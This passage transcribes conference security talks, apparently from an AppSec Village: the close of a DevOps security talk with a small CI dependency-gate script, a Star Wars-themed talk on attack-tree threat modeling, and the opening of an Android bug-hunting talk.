particularly in DevOps, for automating the building of systems and automating testing, have vulnerabilities, because they really weren't meant to go live anywhere. They were basically developer aids, developer tools, and your policy is going to quarantine or prevent them from coming into your local repository. The result is you get a lot of phone calls. Hey, this module, I need it, I need it now, and it's quarantined. Well, that requires getting out on the firewall or proxy and looking at what's quarantined, determining how it's going to be used, where it's going to be used, and whether that CVE applies in this use case, and then deciding whether you can waive it or not. It is a labor-intensive process. I didn't really like doing it this way at first. So I ended up moving to a build-based solution. Build-based solutions are very similar to what we're going to see in just a few minutes, where you basically add an open source review step to your automated build process. If you find that same vulnerability as it's going to production, let's say it's a CVSS of eight, and it's going into production, you fail the build. At that point, the developers have the opportunity to go, okay, I need to get a security waiver, or I need to find a more recent or more updated library that doesn't have that CVE as an outstanding issue. So this ended up reducing the manual intervention. The only problem is you could end up having something on your internal network with a CVSS of seven or higher that's a developer tool. You've got to be very careful when you're whitelisting or removing items from quarantine to understand how it's going to be used and whether the CVE itself can be exploited in that manner. So here are some products once again. OWASP, I've mentioned them several times, great organization. Again, these are not recommendations. These are simply places for you to start if you haven't looked at these already.
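As a rough sketch of that build-gate idea, here is the kind of check that can run as a pipeline step and fail the build when the dependency report contains anything at or above the agreed threshold. The report format, field names, and file path are invented for the example; real scanners such as OWASP Dependency-Check or the commercial tools each have their own output you would parse instead.

# Toy CI step: fail the build if the open source scan report contains any
# finding at or above the agreed severity threshold. The report format here
# (a JSON list of {"package", "cve", "cvss"}) is invented for the example.
import json
import sys

THRESHOLD = 7.0  # "no high or critical findings go to production"

def gate(report_path: str) -> int:
    with open(report_path) as report_file:
        findings = json.load(report_file)

    blockers = [item for item in findings if item["cvss"] >= THRESHOLD]
    for item in blockers:
        print(f"BLOCKED: {item['package']} {item['cve']} (CVSS {item['cvss']})")

    if blockers:
        print("Open source gate failed: upgrade the library or request a security waiver.")
        return 1  # non-zero exit code fails the CI job
    print("Open source gate passed.")
    return 0

if __name__ == "__main__":
    sys.exit(gate(sys.argv[1]))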
And finally, let's talk about automation. So those last three steps, they seem like a lot. And originally, we were doing them manually, and it became unwieldy very quickly. It just took a lot of time and a lot of effort. So what we were able to do was automate most of this into the build pipeline. If you have a continuous integration tool, something like Jenkins, you can add steps that execute static code analysis, dynamic code analysis, and open source analysis with every build. So this gives you all of that protection, over 95% from the studies, with every single build that you do. Now, there are some things that are just too stinking big. So if you're still dealing with legacy applications, you know, monolithic JARs and EARs, if you've got something that's somewhere in the range of hundreds of thousands of lines of code, sometimes close to a million lines of code, this is not going to go well for you, because the dynamic scan, the static scan, those pieces are going to take a long, long time. I tested one application for a friend of mine, just to try it. It was a legacy application, and the scan for just the static code analysis piece took over 12 hours. You can't stop a build for 12 hours and expect the developers not to be concerned. So I don't recommend this for large applications. If you do, you might do it as an asynchronous build step. So basically it says, hey, I've got to go do static code analysis, I'm going to launch it, and then I'm going to continue with my build. You lose the advantage of being able to block at that point, but you still have an automated scan going along. You'll need to have a process in place to alert the development team as well as information security of the results of that scan, and then decide how you want to react. But you lose the ability to block. Fortunately, the industry is really moving towards smaller builds, APIs, microservices, things like that. And inline scans are very, very possible. They're very fast. These tools are tuned for this kind of work, and they run incredibly, incredibly fast. Just an aside: some of the tools are still working on their automated pipeline plugins. So if you are looking at any of the tools, whether it's the ones I've mentioned or something else, make sure that you ask about the maturity of their continuous integration pipeline plugins. Otherwise, you might find yourself stuck manually doing these for a while until you can find a way to do that. I'm going to end with a couple of final thoughts. So the keys to success, hopefully you can read this. They are: start small. Do one thing. For me, it was starting with a training program that literally led to everything else that you saw in this presentation. And as you saw in the presentation, this stuff tended to feed upon itself. The developer training led to more training, which led to the security champions program, which led to everything else. So start small, and it will all come together. Get management buy-in from both information security and app dev management. The centerpiece right there, that has to be the key for me: it has to be fun. When this stuff is no longer fun, I'm not going to do it anymore. We've got to keep making it fun, particularly for our developers. Developers are doing a lot of stuff; adding security on top of everything else they're doing is a pain in the butt. And for the most part, it's not welcome unless you can make it fun.
If you can make it fun, it's going to happen. So just like we just mentioned, automate everything you possibly can. And remember, it's all about those relationships: the relationships with your scrum teams, the relationships with your developers, the relationships with your vendors and the trainers that you can get to come in. So building a good relationship is key. Don't try to reinvent the wheel. The best innovation is usually stolen from somewhere or given from somewhere. So if you can take one piece from this discussion and implement it in your organization, I will feel blessed. I'd love to hear about it. Take it slow. This stuff is new for all of us and it's always changing. And finally, learn what works best in your environment. So I want to wrap up with thank yous. I want to thank you for spending the last 40, 45 minutes, whatever it ended up being, with me and with AppSec Village. I want to thank AppSec Village. I got to volunteer there last year. I ended up spending the entire DEF CON there. After, I think, six years in information security, I finally found my home, and that is the AppSec Village. So thank you to the leadership of AppSec Village for doing this and for giving me this opportunity. I want to reiterate my thanks to Jim Manico; he's kind of been my spirit leader on this journey and I appreciate all you've done. My colleagues Barry and Shane, my partners in crime, you guys are awesome. And finally, my best friend, my wife, who's put up with me doing this and several other things in information security. She's absolutely the best and I can't thank her enough. So thank you guys very much. I appreciate you spending this time with me and I hope you have a really, really excellent rest of your DEF CON. Thanks.
|
The DevOps & Agile Security Toolkit - In this talk, we will look at integrating security into Agile and DevOps. We will discuss strategies, training, tools, and techniques that will let your organization move quickly while doing so safely.
|
10.5446/51610 (DOI)
|
Here we are, the end of day one. Our final talk, something that I've been super excited to hear about. But before we get to that, again, if you haven't gotten a t-shirt, head out to the AppSec Village website; you can pick up a shirt there. And let's give a big thumbs up to everybody who helped to put this on this year. This is fantastic. Definitely want to thank everyone. The next speaker, Mario Areas, is going to talk about threat modeling the Death Star. What better model could we use, right? Mario is a software developer with ten years of experience in four different countries. His expertise involves security, DevOps, and agile practices. Mario helps teams to deliver value quickly while keeping applications, infrastructure, and data safe. With that, let's welcome Mario to the stage. Hello everyone, welcome to my talk, threat modeling the Death Star. My name is Mario. I have been a software developer for over ten years, I moved to be a full-time security engineer two or three years ago, and nowadays I'm a software engineer again. Today I want to talk about threat modeling. Threat modeling is a subject that I feel is very important and is very dear to my heart for many different reasons. But the main reason is one that was shown in the State of DevOps report from last year. The State of DevOps report is a report done by Puppet and other companies, where they survey different companies and try to get information about how efficient they are in a DevOps world. And one of the things they look at is security. And what they found, looking at companies of all different sizes, is that the most effective way to improve your security posture is to do collaborative threat models with the security team and the dev team. That's really, really important to improve your security posture. And that's what I have seen in my own experience as a security engineer as well. Every time I introduce threat modeling to a company or to a team, I can see the benefits of it very quickly, like the improvement of the security posture. But before we jump in and go more into the details about threat modeling, I want to talk a little bit about what the definition is, right? If you try to Google it, you're going to see many different definitions, but this one is the best: threat modeling is a process to identify and enumerate threats. That's what threat modeling is at the end of the day, right? And that makes a lot of sense for security people. But then when you go to non-security people, people who are not threat modeling nerds, they don't get very impressed, right? It's a very dry concept. It's a very abstract concept. And it's really hard to engage people who are not from security to actually understand and get involved with the threat modeling. And that's a hard situation, isn't it? On one hand, threat modeling brings so many benefits to the organization, but on the other hand, it's really hard to gather people to do it. And that was my position a few years ago when I tried to introduce threat modeling in a company. I really knew that threat modeling is quite important, but I also knew that it's not very engaging at all. I was trying to find a balance where I could reap the benefits of threat modeling while making sure people were motivated enough to engage and participate in the process, so that it's not just one more checkbox that you need to tick at the end of the day, right?
Anyway, then I came up with a list of requirements. What are the requirements? The requirements are things I felt that, if they weren't there in the threat modeling process, it wouldn't be very successful; I wouldn't think it was actually something valuable to the company. And I came up with three different requirements, right? One is it needs to be engaging. Threat modeling definitely needs to be engaging. It shouldn't be another boring meeting people need to attend. It should be something more fun and more engaging, so people can at least have a good time in the threat modeling session. It needs to be highly collaborative. Again, the magic of threat modeling happens when you get security doing it and the development team doing it as well, together, collaborating to get the process done. A process where the security team did it behind the scenes and just returned a report to the development team was a no-go for me. That definitely wasn't something I wanted to do. And finally, it needs to be valuable for everyone. It sounds a bit silly, but it's very easy for people to think, I'm doing this threat modeling just to make sure the security team is happy so I can go do my stuff. That's not the idea I want for threat modeling. I want something where, if people are participating and collaborating, they can get something out of it. They can understand the process and see the value of it and then do it again and again. Not only because the security team wants the software to be more secure, but because they also see value and they also want their software to be more secure. Then I looked at very different methodologies. I looked at STRIDE, I looked at PASTA, I looked at many others, but the methodology that I like the most is attack trees. I think that resonates well with me and my experience, and it resonates very well with the teams and companies I have worked for where I introduced it. I really like the way it goes; it's very simple and it's very easy to do. That doesn't mean it's the best methodology for everyone. Different people have different styles, different companies have different cultures. You might find something different for yourself. But for me, when I saw attack trees, I really understood the concept. I really could see that being rolled out to the company. But before I actually tried to do the rollout for the company, I did a pilot first. I chose a few selected teams; they were doing some interesting work, and threat modeling would add great value at that phase of the work. And with that, I talked to them, I did some pilots, I did a few threat models, and then I did a survey at the end of it to see what people thought about the process. And I really asked them to be very honest, because if it wasn't working for them, chances are it wouldn't work for other people in the company, so it wouldn't be successful and we should just start from scratch rather than try to roll out that process. And the numbers I got were very positive, let's say this: 80% of developers found it useful, they found it valuable, and they would participate again. For me, the "would participate again" was the ultimate metric. If they would participate again, it's because I hit the three requirements: they saw value in it, it was collaborative, and it was engaging. And they saw value, they actually saw value for themselves, and they wanted to do it again.
So that made me feel confident, and then I did roll that out to the rest of the company. And I want to talk about that, the process I rolled out, but I want to use Star Wars for it. Because again, threat modeling is very dry, it's a very abstract concept, so I always try to find different ways to make threat modeling a bit more engaging. And Star Wars is one of the most fun ways that I have seen so far. So let's start with Star Wars. And that story starts with yourself, the audience watching this at this point, where you are the new CSO of the Galactic Empire, Chief Security Officer. Well done. You started as a low-level stormtrooper fighting in the trenches against the rebellion, and you made your way all the way to the top. Now you're a Chief Security Officer. Well done. But not everything is like clockwork, is it? That guy now is your new boss. Yeah, and how can I say this? He has a very different style of leadership. This whole thing that you learn about today, blameless culture or servant leadership, is definitely not something he believes in. He's more of an old school kind of guy. He really thinks high accountability is the way to perform. But that's okay, right? Everybody had some problematic boss at some point in their careers, and you're pretty sure you can work around the guy. And, being the CSO, you start to look at the crown jewels of the Empire. What are the most important assets, and what do you need to protect before everything else? And the answer was very easy, and very big as well. The answer was the Death Star. It's the most expensive project in the whole Galactic Empire. It costs around 2 trillion credits. It's been 20 years in the making. It's the biggest weapon of the galaxy and a major strategic asset for the Galactic Empire. So definitely that's where you need to focus. However, it's been like any waterfall project: over budget and overdue, the business is not happy with it, and the business would like to release it to production as quickly as they can, because it's been delayed and delayed and delayed for too many years. So your boss and the Emperor are not very happy. But that's fine. You can work with that. You're a professional, right? Okay, so you've already identified what you need to protect. That's the Death Star. It's a good first step. But you need to have some sort of understanding of what kind of attacks are going to happen, like what kind of attackers you're going to have. And you use a simple exercise called evil personas. The Galactic Empire has been attacked for many years already, so you kind of know exactly what kind of attackers the Empire can have. So let's talk about them, because we need to protect the Death Star against them. And the first one, which is very interesting, is Jar Jar Binks. Jar Jar Binks just represents a class of attackers who don't know very well what they are doing. They don't have too many resources. They also are very competitive, so they keep trying to show their colleagues how good they are. Sometimes they can be annoying for the Empire, but honestly, when it comes to the Death Star, they are not very important personas. So although it's good to list them, they're not very important for the threat modeling of the Death Star. So just move to the next persona. Now we're going to talk about Han Solo. And Han Solo is a very interesting persona, because Han Solo has a lot more expertise.
Han Solo knows what he's doing, and the other bounty hunters, they know what they are doing. They have more resources as well. They have their own ships, they might have different weapons. But then again, they are in it for the money and they don't organize themselves very well. Bounty hunters are very competitive as well. They keep trying to go for the easy prey and get some easy money, but they don't try anything too big or anything like that. When it comes to the Death Star, they can be annoying, but on the other hand they are probably not a big threat either. But these people can be problematic: Jedis. First, their expertise is huge, not only because they have been training for many years, but because they have magic in their favor. How can you defend against magic, when they can just tell a guard "you didn't see me" or whatever? It's really hard to defend against them. Lucky you, it seems your boss managed to kill most of them years and years ago. And the ones out there are probably hidden and not much of a threat anyway. So although you list them as a threat, because they are very unlikely to show up and it's very hard to protect against these people, you also don't focus on them very much. You trust that your boss did a very good job eliminating them. Then we talk about more interesting personas when it comes to the Death Star. And here we talk about insider threats. But honestly, insider threats should be many different personas, because the Empire has many different ranking levels. A stormtrooper that's an insider threat is not as dangerous as a C-level executive like yourself becoming an insider threat. Regardless of their position, though, they have been trained by the Galactic Empire. So they have strong training and they know what they need to do. They are very good at what they do. They might have resources, which is a bit of an interesting thing: if you are a stormtrooper, you don't have much money, but if you are a C-level executive like yourself, you have lots of money, lots of resources. But regardless, again, of their position, they organize themselves pretty well. The Galactic Empire is a military organization, so they know how to organize. The insider threats can join terrorist groups, they can form their own terrorist groups. So they can become a problem, because they organize themselves very well, even if they are at a low level, a stormtrooper. But the most important persona for the Death Star is Princess Leia. Princess Leia represents the rebellion. The rebellion, as you well know, is a terrorist organization trying to bring trouble to the Galactic Empire, whereas the Empire is just trying to make the galaxy stable, you know, a bit of order here and there. But although they are a terrorist organization, they have lots of expertise. They have pilots, they have diplomats, they have spies, and they are very good. They can sometimes go toe to toe with the Galactic Empire. So they do have a lot of expertise. Even for a terrorist organization, they have lots of resources. You are not quite sure where they get the money from, but they do get lots of money. They have a small army, they have ships, they have bases across the galaxy. So they have lots of resources. And for a terrorist organization, they organize themselves pretty well. They have become a major pain for the Galactic Empire in the last few years, sometimes shutting down Empire operations or shutting down entire armies. So definitely Princess Leia is your most important persona, the one you need to look after. Cool.
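If you want something more durable than a slide, one way to capture the output of this kind of evil-personas exercise is as plain data the team can revisit each quarter. This is just one possible shape, not part of any formal methodology, and the 1-to-5 ratings below are rough judgment calls pulled from the story.

# Recording the evil-personas exercise as data the team can revisit.
# The ratings are rough judgment calls, not a formal scoring system.
from dataclasses import dataclass

@dataclass
class Persona:
    name: str
    expertise: int      # 1 = clueless, 5 = elite (or has the Force)
    resources: int      # money, ships, infrastructure
    organization: int   # how well they coordinate with each other
    likelihood: int     # how likely they are to come after this asset

    def priority(self) -> int:
        # Crude ranking: overall capability times likelihood.
        return (self.expertise + self.resources + self.organization) * self.likelihood

personas = [
    Persona("Jar Jar Binks (script kiddies)", 1, 1, 1, 2),
    Persona("Han Solo (bounty hunters)", 3, 3, 1, 2),
    Persona("Jedi (elite, but mostly gone)", 5, 2, 2, 1),
    Persona("Insider threat", 3, 2, 4, 3),
    Persona("Princess Leia (the rebellion)", 4, 4, 4, 5),
]

for persona in sorted(personas, key=Persona.priority, reverse=True):
    print(f"{persona.priority():>3}  {persona.name}")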
So that is the summary of your personas: from script kiddies to bounty hunters, insider threats, Jedi, and Princess Leia with the rebellion. Going back to the real world for a moment: if you want to build personas in your own organization and you are a large company, it shouldn't be very hard, because your organization has probably been attacked before; talk to the security team, the people who handle incident response, and they will have an idea of the kinds of attackers you face. If you work for a smaller company, you can look at other sources that define generic attacker profiles, and then, as you grow and see real attacks, tweak your personas as you go. The important thing is to have a concrete understanding of your attackers instead of staying at the abstract level of an imaginary attacker. Good.

Now you have the asset, the Death Star, and you have the personas, so it is time to build an attack tree. The first thing you need is to get the right people in the room. Remember that threat modeling should be a collaborative exercise where everybody participates together, so that is what you do: you get the Death Star designers and architects and your own team into the same session. It took a lot of trouble; it is hard enough to juggle time zones and book everybody at the same time, and here you are spread across a galaxy where time zones are not even a thing. But somehow you managed, you put everyone in the room, and you even got Darth Vader to do an introduction for the meeting, the kind of C-level kickoff that gives people some motivation.

Then you run the attack tree session. In an attack tree, the root node is the attacker's goal: what the attacker wants to do to your asset. You could look at very different kinds of attacks; for example, Han Solo, a bounty hunter, is probably looking at the Death Star to make some money, maybe stealing weapons, stealing food, stealing lots of stuff. But you need to focus on what is most damaging for the Galactic Empire, and even if Han Solo steals a bunch of weapons or food, that does not really hurt the Empire; annoying, for sure, but not a big problem. So you come up with two attacker goals which, if accomplished, would be truly damaging for the Galactic Empire, and you focus on those: take control of the Death Star, or take the Death Star out of action.

Taking control of the Death Star would be really, really bad. Imagine going through twenty years of project work and releasing to production just to have an attacker take the weapon from you and use it against the Empire; it would be terrible. But it is also very unlikely for the attackers you have, because none of them have the resources to actually operate something like the Death Star: you need a crew of about one million just to run it.
Operating the whole thing requires very specific expertise and a lot of proprietary technology, so even Princess Leia would not be able to take the Death Star away from the Galactic Empire and use it against the Empire. But they definitely can try to take the Death Star out of action. That is probably their first goal: as soon as they know about the Death Star, they will try to take it out of action and remove the Empire's biggest advantage from the game. So that is what you focus on, and you focus on Princess Leia as the persona, because she is probably the only one who can actually pull it off. Cool.

So you chose "take the Death Star out of action". Now you need to think about how an attacker would accomplish that, and this is where the collaboration and the magic happen: the security people throw out some ideas, the developers throw out others, and together you figure out which of these nodes are more likely. With everybody in the room, two kinds of nodes emerge as really important and more likely to happen. One is to disable the Death Star; not a fifteen-minute disablement or turning off the power for a while, but a disablement so severe that the Death Star is effectively not usable anymore, where it would be better to build a new one than to fix it. It is like breaking your iPhone screen: the repair is so expensive that most people just buy a new phone. The other is to destroy the Death Star outright: blow the whole thing up, reduce it to pieces. Those are the two main ways to take the Death Star out of action.

Let's focus for a moment on disabling the Death Star. There are two ways to do that as well: a systems failure or a mechanical failure. A systems failure means, for example, disabling the navigation system, the heating system or the engine system; disabling critical systems in such a way that it causes a chain reaction in the other systems and shuts the Death Star down. Alternatively, you can cause some sort of mechanical failure, a problem in the hardware itself, which again triggers a chain reaction that shuts the whole Death Star down.

How would you accomplish these things? For a systems failure, you need to compromise a critical IT system; for a mechanical failure, you need to overload critical infrastructure. Let's elaborate a little. There are many systems running inside the Death Star that manage some sort of critical infrastructure, so if an attacker has access to those systems, they can do damage. But the systems normally protect themselves against problematic parameters, dangerous values or dangerous actions, so the attacker needs not just access: they need to compromise the system so they can bypass those protections and cause the systems failure.
For a mechanical failure, you overload some critical infrastructure; for example, you might overload the heating system somehow, causing the hardware to fail, or making the Death Star so uncomfortable that people have to leave the ship. There are different ways to do it, but the interesting thing is that, whether you are trying to compromise a critical IT system or overload critical infrastructure, you need access to the internal network; there is no other way. To reach the sensitive areas of the Death Star and take those kinds of actions you need that kind of privilege, and to compromise a critical IT system you need to be inside the network so you can interact with it.

And it really is an internal network, because when you think about it, the Death Star is just a weapon; it is not a service, they don't expose systems publicly for people to access. As a weapon, they hide everything as much as they can, so to get privileged access you need to be on the internal network, and anything public is probably unimportant and segregated from the internal network. And to get onto the internal network you need to be inside the Death Star; there is no other way, because again the Death Star does not expose its systems to the outside world and everything is well segregated. Once inside you could go to a server room, or steal an employee badge or biometrics, in order to get privileged access. We could go into more detail about how an attacker would get physical access to the Death Star, but the Death Star has a crew of one million, so it is quite plausible that an attacker like Princess Leia could manage it, and if not, we also have the insider threat persona: someone who has the right to be inside the Death Star and then tries to do something malicious once inside. So we stop this branch of the attack tree here and move to the next part.

This is what we have so far: take the Death Star out of action, disable the Death Star, then systems failure and mechanical failure and so on. But that is only one branch of the attack tree; there is the other one, where you want to destroy the Death Star. How would you do that? There are basically two ways. One is a big military attack: the Death Star is a huge weapon that can cause lots of damage, but it is still vulnerable to that kind of assault. And there is another way that you figured out during the threat modeling session, and you are quite proud you caught it. At the very core of the Death Star there is a reactor that controls everything and provides energy for the whole ship. The reactor runs very, very hot, so it needs to vent that heat into space, and the way they did it was to build ventilation shafts that go from the core straight up to the surface of the ship, so the heat can dissipate.
But this is also a vulnerability, because now there is a straight path down to the core, and the core is very unstable: any explosion that reaches it can cause a chain reaction that blows up the whole Death Star. That is a really big problem if an attacker can exploit it. There is some protection, of sorts. The first is obscurity: you need to know where the port is, the Death Star is huge, and there is no easy way for an outside attacker to know where to hit. Second, the port is very small, only two meters wide, so it is a really hard shot for any pilot to land a bomb in there. It is not very likely to happen, but it is still not great. So, to destroy the reactor, you need to shoot the thermal exhaust port, and to shoot the thermal exhaust port you need to know where it is, which means you need to obtain the Death Star plans. That is the second branch of the attack tree.

Together, the first and second branches of the attack tree are what you found out about the main problems with the Death Star design and the current procedures, and these are the main goals an attacker could try to accomplish: privileged access to the internal network is a problem, because from there they have several ways to disable the Death Star; a military attack is huge, but something the rebellion could pull off if you are not prepared; and finally the thermal exhaust port, because if an attacker somehow manages to shoot it, the chain reaction destroys the reactor and the Death Star with it.

That was the threat modeling session, and it surfaced real threats. The reason I like attack trees is that they are a problem-solving exercise, and everyone in IT has a problem-solving mindset: we have a problem, we try to solve it, that is how we operate. But instead of using that skill to build, you now flip the mindset and use your problem-solving skills to attack. It is really powerful to get people who usually never think about attackers or attacks to think this way, and it is fascinating to watch them find vulnerabilities in their own designs. It also matters that they collaborated in the session: when you later go back and say, remember that vulnerability we found, we need to fix it, they don't contest it, because they were there, maybe they were the ones who found it, and they are also the ones who know how to fix it most easily. It changes how they look at their own system, and that can only lead to good things, because they know how to fix the problems and make the system more secure. Cool.

So now you have identified the risks and the threats, and it is time to mitigate them.
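If you want to capture a tree like this outside of a whiteboard, a minimal sketch in code could look something like the following. This is purely illustrative: the node names are just the ones from this story, and real tooling would typically also attach impact and likelihood to each node.

```kotlin
// Minimal sketch of the Death Star attack tree as data
// (node names come from this story; purely illustrative).
data class AttackNode(
    val goal: String,
    val children: List<AttackNode> = emptyList()
)

val deathStarTree = AttackNode(
    "Take the Death Star out of action",
    listOf(
        AttackNode(
            "Disable the Death Star",
            listOf(
                AttackNode("Cause a systems failure",
                    listOf(AttackNode("Compromise a critical IT system",
                        listOf(AttackNode("Gain privileged access to the internal network"))))),
                AttackNode("Cause a mechanical failure",
                    listOf(AttackNode("Overload critical infrastructure",
                        listOf(AttackNode("Gain privileged access to the internal network")))))
            )
        ),
        AttackNode(
            "Destroy the Death Star",
            listOf(
                AttackNode("Launch a large military attack"),
                AttackNode("Destroy the reactor",
                    listOf(AttackNode("Shoot the thermal exhaust port",
                        listOf(AttackNode("Obtain the Death Star plans")))))
            )
        )
    )
)

// Walk the tree and collect the leaves: the concrete attacker steps to mitigate.
fun leaves(node: AttackNode): List<String> =
    if (node.children.isEmpty()) listOf(node.goal)
    else node.children.flatMap { leaves(it) }

fun main() {
    leaves(deathStarTree).forEach(::println)
}
```

Walking the leaves gives you the concrete attacker steps, which is exactly the list you carry into the risk-rating and mitigation discussion that follows.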
The first risk to mitigate is privileged access to the internal network. The impact is high: if an attacker actually manages this, it is really problematic for the Empire. The likelihood you rate as medium, because it is not easy, you need to be inside the Death Star, but the Death Star's network is not very secure and the rebellion has been hacking the Galactic Empire for years. You are a good security professional, though, so you come up with measures to implement on the network: some quick wins, some testing, and then proper hardening to make it much harder for an attacker to get privileged access. After that work is done, the likelihood goes from medium to low. The impact stays high, it is really hard to bring that down, but at least the risk is now unlikely to materialize.

The next risk is a military attack. Again the impact is really high: if the rebellion can pull off such an attack, it can destroy the Death Star. The likelihood is also high, because if you are Princess Leia and you learn that your biggest adversary has such a weapon, you probably want to strike first. There are a few things you can do to mitigate this risk. First, you prepare the crew to respond to attacks efficiently: you define runbooks, keep people on call, keep training and running exercises, so that when the real thing comes, the response works. The Death Star is also going to need support, which is why you bring in Star Destroyers, the other big ships of the Galactic Empire: if they are close by when the Death Star is attacked they can provide really strong support, and their presence alone probably makes the rebellion less likely to attack. Finally, you try to monitor the rebellion's activities: pulling off an attack of that size requires a huge mobilization, lots of people and a lot of coordination, so if you pick up those signals and interpret them, you can prepare before they actually launch the attack. With all of that, the impact goes from high to medium, because even if the rebellion tries a strong military attack you will be much better prepared, and maybe you can defeat them or at least buy enough time to get the Death Star out of harm's way. The likelihood also becomes medium, because if the rebellion cannot be sure of destroying the Death Star, they most likely will not attack; they only go in when victory looks certain. Regardless, you need to be prepared, and that is what you did. Well done.

And finally, shooting the thermal exhaust port. The impact, again, is high, like the other risks: if somebody manages to shoot the thermal exhaust port, the reactor is destroyed and the Death Star with it. The likelihood came out as low, and you were not entirely comfortable with that rating. Why was it rated low? Because you need to know where the port is.
And even if you do, it is a really difficult, hard shot. Still, you wanted to do a bit more; you wanted some sort of protection, maybe closing the port when an attacker approaches, opening different ones, adding extra layers of defense, and you argued for that. But remember, the project had already been delayed for many years and was over budget for just as long, so the business did not want to go back to the design, redesign the ports to make them more secure and implement that, delaying the project a few more years. The business decided to accept the risk. Still, you did what you could: you would at least hide the Death Star plans, because one of the things an attacker needs in order to shoot the thermal exhaust port is to know where the port is. If you make the plans hard to obtain, you mitigate the risk to a certain level. That was all you could do, so you did it, and you moved on with your life, looking at other areas of the Galactic Empire's security and hoping for the best.

Eventually the Death Star was released, and it was a source of joy for the Empire and a lot of trouble for its enemies. And then it happened: the Death Star was destroyed, which is not a good outcome for anyone in the Galactic Empire. But you are a professional, so what do you do in that situation? Forensic analysis. You try to figure out what went wrong and how the rebellion managed to destroy such an important weapon. The answer is this guy: Luke Skywalker. He is the one who managed to shoot the thermal exhaust port. And there are some interesting things about Luke Skywalker. First, he is a Jedi, which is strange, because they were supposed to be hiding, not attacking the Empire. Second, right before he took the shot he was about to be shot down, and the person who saved him was a bounty hunter who showed up at the last minute and cleared his tail so Luke could shoot the port; that is odd, because bounty hunters only work for money and don't organize themselves, so why is a bounty hunter helping a Jedi? Another thing: Luke Skywalker is actually Princess Leia's brother, which makes him a high-ranking rebellion official as well, so he is not only a Jedi but also a rebel official. And the worst part of all: Luke Skywalker is the son of your boss. That makes the whole thing a lot more complicated. Should Luke Skywalker be considered an insider threat now? You don't know, but you don't have a good feeling about it. That is a problem for your boss to sort out with his family and his own boss; the fact remains that Luke Skywalker is the one who pulled off the shot. But how did Luke actually find out about the port? The answer is these two people here: they managed to hack the Galactic Empire and get the plans.
And you had done a good job: you put the Death Star plans in a very secure location, the most secure the Galactic Empire had. These two managed to get to that location, break into the data center, steal the hard drive and send a copy of it to the rebellion. And you know the worst part? There was no encryption at rest, so all they needed was a copy of the drive. Not great. That is how they did it: they stole the plans, sent them to the rebellion, the rebellion quickly attacked the Death Star, and by something close to a miracle they managed to shoot the thermal exhaust port and everything was destroyed. Well, good luck delivering your forensic report to your boss.

Now let's talk a little about lessons learned. The interesting thing about this story is that the problem with the thermal exhaust port was found at the very end of the design, at the very end of the build, right before going to production. That is a problem that happens in every company: you find a security problem at the very end, and nobody wants to fix it before the release. Threat modeling is something you should do early enough. In the case of the Death Star, if the threat modeling had been done at the design stage, when people were designing the thermal exhaust port, you or somebody on your team could have seen the problem and fixed the design right there. It is much cheaper to fix things at the design level, or at the beginning of construction, or in the case of software at the beginning of coding, than at the very end. So if you are going to do threat modeling, do it early and do it often, because things change, especially in software: we pivot, we add features, we descope features, so you need to revisit the model from time to time.

There are always unknowns. In this case Luke Skywalker was a big unknown; he was at least three different personas at once. So even when you have done threat modeling and covered some of the risks, remember that there may be things you have not seen, information you do not have, or pieces that connect in ways you did not expect. Having done threat modeling does not mean you are secure; it means you have covered some of the worst threats, and you still need to do work on top of it. Threat modeling is just the beginning.

And finally, threat modeling must be engaging. If people come to a meeting that is boring, complicated or just a checkbox exercise, they do not engage; if they do not engage, they do not collaborate, and if they do not collaborate, you lose the magic of threat modeling and it simply does not work as well. I have been using playful scenarios like this one, and I think it has been very successful where I have done it, but it does not have to be Star Wars. Whatever you do for threat modeling, make sure the people involved are engaged.
They should have a good time and see value in it, so that they keep coming back and keep doing these exercises over and over again. Cool. That is all I had for today. Thank you very much, and I'll see you in the next video.
|
It is a known fact the Empire needs to up their security game. The Rebellion hacks their ships, steals their plans, and even creates backdoors! In this talk, we will help the Empire by threat modeling the Death Star. Traditionally, Threat Models have been a slow and boring process that ends up with a giant document detailing every possible security problem. This approach, although useful in the past, is not necessarily a good fit for an ever-changing environment (or when you have Jedis as enemies!). I will introduce Attack Trees and how they can fit nicely into a DevOps world. Come and join the Dark Side! We might save the Empire after all!
|
10.5446/51613 (DOI)
|
Come on in, move to the center of the row, make sure every single seat gets filled. We want to make sure we have enough room for everybody and that everybody gets a seat. Get close, get friendly, this is DEF CON, make friends... those are some of the things I wish I could be telling you right now. Unfortunately we can't: I'm here and you are wherever you are, respectively. So with that said, we forge on, and the second year of the AppSec Village continues. For this talk we've got Pedro Umbelino and João Morais to talk about bug foraging in Android. Pedro is a security researcher by day and a Hackaday contributor by night. He messes around with computers, started on the Spectrum, lived through the bulletin board age, has been around since the early days of the Internet and still roams IRC. He is known online by his handle, Cryptor, and he likes all sorts of hacks. João is a penetration tester and researcher who started on the blue team and was later attracted to the red side of the force. Although he is more focused on application security, he has learned all sorts of attack vectors. So take some time, sit back, enjoy the talk, and help me welcome these two fantastic presenters.

Hello and welcome to the Android bug foraging session. It's great to be here at the DEF CON Safe Mode AppSec Village giving this talk, despite everything that is happening; it is really good to see the community coming together to make sure this kind of event still happens. My name is Pedro Umbelino. I'm a senior security researcher on Checkmarx's security research team, and I'm also a security researcher at Char49. Sometimes I write for Hackaday. One of my hobbies is making hardware, and my daytime job is breaking software. I'm giving this talk with a friend and colleague, João.

Thank you, Pedro. Hello, everyone, and thanks for joining us today. My name is João Morais. I'm a penetration testing team lead for a multinational company, and I also do pentesting and security research for other companies. I'm part of the Checkmarx and Char49 security research teams. My background is quite wide; I have done many different things over the years, always related to security, and in recent years I've been more focused on application security and mobile security, which is exactly what we brought here today. I'll hand the mic over to Pedro so he can talk a little about these bug foraging concepts.

Thanks, João. Foraging: the act of identifying and gathering wild food in nature. Bug foraging is kind of the same, except you are not in nature, you are in the Android ecosystem, and you are not hunting bugs to eat; you eat because you hunt bugs. Okay, it's not quite the same, but you get the idea. Our motivation for this talk was that, instead of taking a theoretical approach and sharing best practices for Android development, we wanted to share real-life examples of vulnerabilities we found in our analyses: our process for approaching them and devising meaningful attack scenarios and proofs of concept, in a nutshell the overall experience from the first crash until the disclosure process. For that, we are going to use four examples of vulnerabilities in different apps. Some of them are from our older work and some are being disclosed here first-hand. João is going to talk a bit about which vulnerabilities we are going to cover.
Thank you, Pedro. Moving on to the agenda: we are going to present four cases, starting with Tinder, then "app X", an app whose real name we cannot say, then Google Camera and Samsung Find My Mobile, two really well-known apps in the Android world, and then some final words with the main takeaways from this bug foraging experience.

